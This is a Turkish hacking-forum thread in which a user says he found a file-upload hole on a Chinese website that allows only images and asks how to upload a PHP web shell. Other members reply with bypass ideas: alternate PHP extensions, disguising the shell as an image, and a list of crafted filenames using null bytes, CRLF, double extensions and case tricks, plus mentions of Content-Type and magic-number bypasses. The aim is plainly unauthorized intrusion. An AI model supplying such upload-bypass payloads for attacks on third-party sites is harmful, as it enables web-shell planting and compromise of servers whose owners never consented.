Upload açığı buldum fakat sadece img formatı izni var nasıl shell basarım?

gme_0 · 7 Eki 2023

bi tane çin sitesinde upload açığı buldum ama sadece img (jpg,jpeg,png)formatında olan dosyalara izin veriyor ben bu siteye php shell dosyasını nasıl atarım

louise0357 · 7 Eki 2023

gme_0' Alıntı:
bi tane çin sitesinde upload açığı buldum ama sadece img (jpg,jpeg,png)formatında olan dosyalara izin veriyor ben bu siteye php shell dosyasını nasıl atarım

bypass Deneyebilirsin.

Örneğin php dosyasının uzantısını " .php1 , .php2 , .php3 , .phtml " gibi değiştirerek deneyebilirsin.

Eğer sorunun çözüldü ise konuyu Çözüldü olarak işaretlemeyi unutma!

gme_0 · 7 Eki 2023

louise0357' Alıntı:
bypass Deneyebilirsin.

Örneğin php dosyasının uzantısını " .php1 , .php2 , .php3 , .phtml " gibi değiştirerek deneyebilirsin.

Eğer sorunun çözüldü ise konuyu Çözüldü olarak işaretlemeyi unutma!

denedim de olmadı fotoraf yüklemeye izin veriyor sadece

MrMaXim · 7 Eki 2023

shell e gif veya resim formatı vererek de oluyor diye biliyorum

gme_0 · 7 Eki 2023

MrMaXim' Alıntı:
shell e gif veya resim formatı vererek de oluyor diye biliyorum

yok hocam denedim olmadı

ExeOweR · 8 Eki 2023

Kod:

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5...
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

Bypass Content-Type, Magic Number, Compression Resizing bu bypass yöntemlerinide deneye bilirisin

Upload açığı buldum fakat sadece img formatı izni var nasıl shell basarım?

gme_0

Üye

louise0357

Anka Team Junior

gme_0

Üye

MrMaXim

Katılımcı Üye

gme_0

Üye

ExeOweR

Kıdemli Üye

Sosyal medya sayfalarımız